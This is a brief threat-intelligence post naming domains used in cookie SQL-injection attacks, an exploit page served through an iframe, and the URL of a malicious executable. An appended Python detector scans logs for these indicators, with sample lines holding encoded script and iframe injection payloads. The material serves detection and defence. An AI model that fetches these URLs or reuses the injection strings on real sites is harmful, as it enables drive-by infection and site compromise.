Cookie SQL-injection domains
These 2 domains are used in the cookie SQL-injection attacks:
- hanrou7.cn
- me1me.cn
Pages on the above 2 domains load http://www.wow088.com/wang/index.htm in an iframe, which is where the exploits are located.
The malicious executable is at http://www.wow088.com/wang/ms.exe. The VT analysis is here.
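
A defensive check built on the indicators above, as an added example that is not part of the original post: it URL-decodes logged request lines (Cookie values included) or stored page content and flags references to the listed domains, matching whole hostnames so that look-alike names do not trigger. The log layout, the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Domains named in the post: two injected references and the exploit host.
IOC_DOMAINS = {"hanrou7.cn", "me1me.cn", "wow088.com"}

# Host part of an absolute or protocol-relative URL.
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+)", re.I)

def full_decode(value, max_rounds=3):
    """Undo repeated URL-encoding; logged cookie values are often encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def ioc_hosts(text):
    """Return the listed domains referenced in text (exact host or subdomain)."""
    hits = set()
    for host in HOST_RE.findall(full_decode(text)):
        host = host.lower().rstrip(".")
        hits.update(d for d in IOC_DOMAINS if host == d or host.endswith("." + d))
    return hits

def scan(lines):
    """Return (line number, matched domains) for every line with a hit."""
    return [(n, sorted(h)) for n, line in enumerate(lines, 1) if (h := ioc_hosts(line))]

# Constructed sample input: three access-log lines in an assumed layout that
# records the Cookie header, then one line of stored page content.
SAMPLE = [
    '198.51.100.7 "GET /news.asp" 200 cookie="id=1%3Cscript%20src%3Dhttp%3A%2F%2Fhanrou7.cn%2FPLACEHOLDER%3E"',
    '198.51.100.7 "GET /news.asp" 200 cookie="id=1%253Ciframe%2520src%253D%252F%252Fwww.me1me.cn%252F%253E"',
    '192.0.2.10 "GET /news.asp" 200 cookie="ref=http%3A%2F%2Fnothanrou7.cn%2F"',
    '<iframe src="http://www.wow088.com/wang/index.htm" width=0 height=0></iframe>',
]

if __name__ == "__main__":
    for lineno, domains in scan(SAMPLE):
        print(f"line {lineno}: references {', '.join(domains)}")
```

The same `scan` function can be pointed at exported database text columns to find rows where an injected reference has already been stored.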